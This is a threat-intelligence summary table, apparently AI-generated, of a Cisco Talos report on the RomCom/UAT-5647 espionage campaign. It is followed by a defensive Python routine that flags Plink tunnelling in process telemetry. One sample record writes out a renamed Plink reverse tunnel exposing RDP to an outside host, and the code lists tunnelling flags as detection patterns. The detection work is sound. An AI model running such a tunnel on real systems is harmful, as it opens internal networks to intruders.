| Category | Details |
|---|---|
| Threat Actors | UAT-5647 (also known as RomCom) - Russian-speaking group |
| Campaign Overview | Active since late 2023, targeting Ukrainian government and Polish entities. Focus on espionage and potential ransomware attacks. |
| Target Regions (Victims) | Ukrainian government entities and unknown Polish entities. |
| Methodology | Spear-phishing emails delivering malware downloaders (RustyClaw, MeltingClaw), which stage backdoors (DustyHammock, ShadyHammock); followed by lateral movement and tunneling into the enterprise network. |
| Product Targeted | Edge devices, internal network systems, and critical infrastructure of Ukrainian and Polish entities. |
| Malware Reference | SingleCamper (RomCom variant), RustyClaw, MeltingClaw, DustyHammock, ShadyHammock |
| Tools Used | PuTTY's Plink (for tunneling), PowerShell (for reconnaissance), C++- and Rust-based tooling, IPFS (InterPlanetary File System) for payload hosting |
| Vulnerabilities Exploited | No specific CVE is named in the source. The activity described is post-compromise abuse of legitimate access paths: tunneling through internal ports, network reconnaissance, and compromised edge devices. |
| TTPs | Spear-phishing (T1566), Ingress tool transfer via downloaders (T1105), PowerShell (T1059.001), Protocol tunneling (T1572), System network configuration discovery (T1016), System information discovery (T1082), Archive collected data (T1560) |
| Attribution | Likely Russian-speaking actors, attributed to UAT-5647 based on previous incidents |
| Recommendations | Detection coverage via Cisco Secure Endpoint, Secure Web Appliance, Secure Email, Secure Firewall, and Secure Malware Analytics; multi-factor authentication with Cisco Duo. |
| Source | Cisco Talos Blog |
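The tunneling row above (PuTTY's Plink, T1572) is the item in this table that maps most directly to a host-based detection: Plink run as a tunnel carries port-forwarding flags that an interactive SSH session does not. The following is an added example, not code from the Talos report or from this page. It is a small Python triage routine over constructed process-creation records (the kind of fields Sysmon Event ID 1 or an EDR would emit) that scores Plink invocations for reverse port forwards, non-interactive flags, passwords on the command line, renamed binaries, forwards to RDP/SMB/WinRM, and scripting-host parents. The record layout, sample paths, hosts, addresses and scoring weights are all assumptions.

```python
"""Flag PuTTY Plink invocations used for reverse tunnelling in
process-creation telemetry.

Added example for this summary page; not code from Cisco Talos. The
record format is constructed and simplified: image path, the PE version
resource's OriginalFileName, the parent image, and the command line.
"""
import shlex
from dataclasses import dataclass

# Hallmarks of Plink used as a tunnel rather than an interactive client.
TUNNEL_FLAGS = {"-R", "-L", "-D"}          # remote / local / dynamic forwards
NON_INTERACTIVE_FLAGS = {"-N", "-batch"}   # no shell, no prompts
SENSITIVE_PORTS = {3389: "RDP", 445: "SMB", 5985: "WinRM", 22: "SSH"}
SCRIPT_PARENTS = ("powershell.exe", "cmd.exe", "wscript.exe", "rundll32.exe")


@dataclass
class ProcEvent:
    image: str
    original_file_name: str
    parent_image: str
    command_line: str


def forwarded_ports(argv):
    """Return destination ports from -R/-L specs.
    Plink syntax: -R [listen-addr:]listen-port:host:port (same for -L);
    the last ':'-separated field is the destination port."""
    ports = []
    for i, tok in enumerate(argv):
        if tok in ("-R", "-L") and i + 1 < len(argv):
            fields = argv[i + 1].split(":")
            if fields[-1].isdigit():
                ports.append(int(fields[-1]))
    return ports


def is_plink(ev):
    # A renamed plink.exe keeps its OriginalFileName, so check both.
    return (ev.image.lower().endswith("plink.exe")
            or ev.original_file_name.lower() in ("plink", "plink.exe"))


def assess(ev):
    """Return (score, reasons); score 0 means nothing suspicious."""
    if not is_plink(ev):
        return 0, []
    try:
        argv = shlex.split(ev.command_line, posix=False)  # keep Windows paths intact
    except ValueError:
        argv = ev.command_line.split()
    flags = set(argv)
    score, reasons = 0, []
    if "-R" in flags:
        score += 3; reasons.append("remote (reverse) port forward -R")
    elif flags & TUNNEL_FLAGS:
        score += 1; reasons.append("local/dynamic port forward")
    if flags & NON_INTERACTIVE_FLAGS:
        score += 1; reasons.append("non-interactive (-N/-batch)")
    if "-pw" in flags:
        score += 1; reasons.append("password passed on command line (-pw)")
    for port in forwarded_ports(argv):
        if port in SENSITIVE_PORTS:
            score += 2; reasons.append(f"forwards {SENSITIVE_PORTS[port]} ({port})")
    if not ev.image.lower().endswith("plink.exe"):
        score += 2; reasons.append(f"renamed binary: {ev.image}")
    if ev.parent_image.lower().endswith(SCRIPT_PARENTS):
        score += 1; reasons.append(f"spawned by {ev.parent_image}")
    return score, reasons


def triage(events, threshold=4):
    """Return [(index, score, reasons)] for events at or above threshold."""
    hits = []
    for i, ev in enumerate(events):
        score, reasons = assess(ev)
        if score >= threshold:
            hits.append((i, score, reasons))
    return hits


# Constructed sample telemetry (hosts and addresses are fictional).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\PuTTY\plink.exe", "Plink", r"C:\Windows\explorer.exe",
              r'"C:\Program Files\PuTTY\plink.exe" -ssh admin@jumphost.corp.example'),
    ProcEvent(r"C:\Users\Public\svchost.exe", "Plink", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "svchost.exe -ssh -N -R 0.0.0.0:8443:127.0.0.1:3389 -pw Sunflower!2 tun@203.0.113.7"),
    ProcEvent(r"C:\Tools\plink.exe", "Plink", r"C:\Windows\System32\cmd.exe",
              "plink.exe -L 3390:dc01.corp.example:3389 ops@bastion.corp.example"),
]

if __name__ == "__main__":
    for idx, score, reasons in triage(SAMPLE_EVENTS):
        print(f"event {idx}: score {score}: " + "; ".join(reasons))
```

The weights are illustrative; the point is that `-R` (a listener on the attacker's host pointing back into the network), `-N`, a renamed image and a forward to 3389 or 445 rarely co-occur in legitimate administration, while a plain `-L` from an admin's bastion session should score low enough to review rather than page on.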
Read full article : https://blog.talosintelligence.com/uat-5647-romcom/
The above summary has been generated by an AI language model